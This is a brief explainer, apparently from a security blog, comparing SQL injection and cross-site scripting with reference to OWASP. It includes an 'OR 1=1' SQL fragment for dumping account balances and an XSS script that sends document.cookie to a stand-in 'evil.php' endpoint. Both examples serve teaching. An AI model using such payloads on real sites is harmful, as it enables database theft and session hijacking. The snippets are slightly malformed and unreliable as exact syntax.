The main difference between a SQL and XSS injection attack is that SQL injection attacks are used to steal information from databases whereas XSS attacks are used to redirect users to websites where attackers can steal data from them. SQL injection is data-base focused whereas XSS is geared towards attacking end users.
A SQL injection attack happens when structured query language (SQL) code is injected into forms, cookies, or http headers that do not use data sanitizing or validation methods to verify that information fits within prescribed GET or POST parameters. This flaw allows data exfiltration, changes, or deletion from databases that are connected to websites. According to the open web application security project (OWASP), the five main techniques used in SQL injection attacks are union operator, boolean, error based, out of band, and time delay. Here’s an example of possible SQL injection syntax that can be used to retrieve all customer account balances if not properly restricted on website: balance FROM accounts WHERE account_owner_id = 0 OR 1=1.
In contrast, an XSS attack uses malicious code to redirect users to malicious websites, steal cookies or credentials, or deface websites. This is usually accomplished using malicious scripts that are executed in client browsers as a result of user input, functional statements, client requests, or other expressions. For example, attackers can attack maliciously crafted URLs via email phishing attempts, email attachments with embedded links, frames on legitimate websites, and web forums that are known to be frequently visited by targeted users. While SQL injection attacks target information in back end databases, XSS attacks focus on stealing data from the website’s front end. According to OWASP, the following syntax can be used to perform an XSS attack to steal cookie data is if input validation is not used:
<SCRIPT type=”text/javascript”>
Var adr = ‘../evil.php?cakemonster=’ + escape(document.cookie);
</SCRIPT>